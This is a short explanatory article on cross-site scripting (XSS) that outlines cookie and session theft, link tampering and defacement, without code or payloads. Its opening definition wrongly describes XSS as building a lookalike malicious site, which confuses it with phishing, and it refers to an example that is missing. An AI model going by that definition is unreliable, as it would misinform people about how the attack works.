Cross Site Scripting (XSS)

Cross site scripting

One of the greatest weaknesses in websites is cross site scripting, also known as XSS. A vulnerability that allows the malicious person to trick its victim into thinking that the website they are on is legitimate, when in fact it is a malicious site that has been created to look identical to the legitimate site.

The attacker does this with the intention of capturing the details of the victim, or to lure the victim into granting the attacker access to the victim’s machine. The attack is facilitated by the victim going to an infected site, normally directed there by the attacker. This could be by clicking on a link.

A common example is email confirmation links like the one below, the victim thinks that the email is from their email provider and confirm their details which then gives the hacker access

 

Consequences of an attack

XSS code can be crafted to lift a variety of sensitive data including any information presented on the same page where the cross-site code was planted. But the most dangerous risk is the theft of user authentication credentials.

Many sites save authentication or session credentials in a browser cookie. Malicious code can lift this cookie and send it to a server controlled by the attacker. With that cookie in hand, the attacker might be able to access the same web site masquerading as the victim user, bypassing any login.

Even if the compromised site does not provide access to highly sensitive content like e-mail or finances, a hacker might be able to access personal details that can be leveraged against a more sensitive site such as the user’s webmail account.

Malicious code can also be designed to alter the content on the page presented to the site visitor. One nasty trick would be to change the destination of a link on the page (or present a new link that the visitor is urgently told to click), baiting them into visiting a malicious site fully engineered by the attacker to launch a more serious attack.

Alternatively, an attacker might use an XSS attack against the site owner rather than the site visitor. The same trick of altering output can be used to vandalise content – imagine a news site where the XSS attack defaces headlines and undermines the credibility of the site.